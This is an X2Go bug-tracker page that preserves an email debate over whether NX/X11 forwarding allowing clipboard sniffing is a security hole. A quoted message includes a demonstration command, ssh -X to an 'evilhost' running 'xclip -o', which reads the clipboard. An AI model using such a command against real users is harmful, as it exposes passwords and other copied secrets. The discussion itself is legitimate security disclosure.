X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security

Full log

🔗 View this message in rfc822 format

X-Loop: owner@bugs.x2go.org
Subject: Bug#258: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
Reply-To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Resent-From: Christoph Anton Mitterer <calestyo@scientia.net>
Resent-To: x2go-dev@lists.berlios.de
Resent-CC: X2Go Developers <x2go-dev@lists.berlios.de>
X-Loop: owner@bugs.x2go.org
Resent-Date: Mon, 01 Jul 2013 13:03:01 +0000
Resent-Message-ID: <handler.258.B258.137268309814692@bugs.x2go.org>
Resent-Sender: owner@bugs.x2go.org
X-X2Go-PR-Message: followup 258
X-X2Go-PR-Package: x2goclient
X-X2Go-PR-Keywords: security
Received: via spool by 258-submit@bugs.x2go.org id=B258.137268309814692
          (code B ref 258); Mon, 01 Jul 2013 13:03:01 +0000
Received: (at 258) by bugs.x2go.org; 1 Jul 2013 12:51:38 +0000
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
X-Spam-Status: No, score=-0.7 required=5.0 tests=RCVD_IN_DNSWL_LOW
	autolearn=ham version=3.3.2
X-Greylist: delayed 473 seconds by postgrey-1.34 at ymir; Mon, 01 Jul 2013 14:51:37 CEST
Received: from mailgw02.dd24.net (mailgw02.dd24.net [])
	by ymir (Postfix) with ESMTPS id 588215DA79
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 14:51:37 +0200 (CEST)
Received: from localhost (amavis01.dd24.net [])
	by mailgw02.dd24.net (Postfix) with ESMTP id 324E83569D4
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 12:43:44 +0000 (GMT)
X-Virus-Scanned: domaindiscount24.com mail filter gateway
Received: from mailgw02.dd24.net ([])
	by localhost (amavis01.dd24.net []) (amavisd-new, port 10197)
	with ESMTP id Khrh8wX8GhAr for <258@bugs.x2go.org>;
	Mon,  1 Jul 2013 12:43:39 +0000 (GMT)
Received: from [] (unknown [])
	(using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits))
	(No client certificate requested)
	by mailgw02.dd24.net (Postfix) with ESMTPSA id 42C8835679C
	for <258@bugs.x2go.org>; Mon,  1 Jul 2013 12:43:39 +0000 (GMT)
Message-ID: <1372682609.25918.14.camel@heisenberg.scientia.net>
From: Christoph Anton Mitterer <calestyo@scientia.net>
To: 258@bugs.x2go.org
Date: Mon, 01 Jul 2013 14:43:29 +0200
In-Reply-To: <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
References: <1372646308.18508.2.camel@heisenberg.scientia.net>
Content-Type: multipart/signed; micalg="sha512";
X-Mailer: Evolution 3.4.4-3 
Mime-Version: 1.0
[Message part 1 (text/plain, inline)]
On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> Yes, other related tools like X11. x2go is basically just a faster
> version of the traditional xforwarding. In X11 every client can always
> access the clipboard/selection/etc., so you will also have the same
> security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> demonstrates this.
Well but that "argument" doesn't really count:
1) Just because others do it plainly insecure, you cannot do it like
this as well... like as if Gentoo would say "if Debian breaks their
OpenSSL entropy, we should do so, too"... o.O

2) Literally no one who has a decent mind of security, will allow other
hosts do directly access their X server.. because then you're (security
wise) anyway screwed...
And I thought NX would secure what's sent from remote in order to not
being able to overtake the input/output devices of the hosts (whole)

> I disagree, this is not a hole at all, it works as intended. Its just
> that users are often not educated about the implications of passing
> around passwords via the clipboard etc.
Na I disagree... if even people would be educated (which is not
realistic) it will happen by accident, that you copy sensitive
information... sometimes other programs may do this even automatically
and you can't to anything against.

[smime.p7s (application/x-pkcs7-signature, attachment)]

Send a report that this bug log contains spam.

X2Go Developers <owner@bugs.x2go.org>. Last modified: Fri Feb 3 14:26:16 2023; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.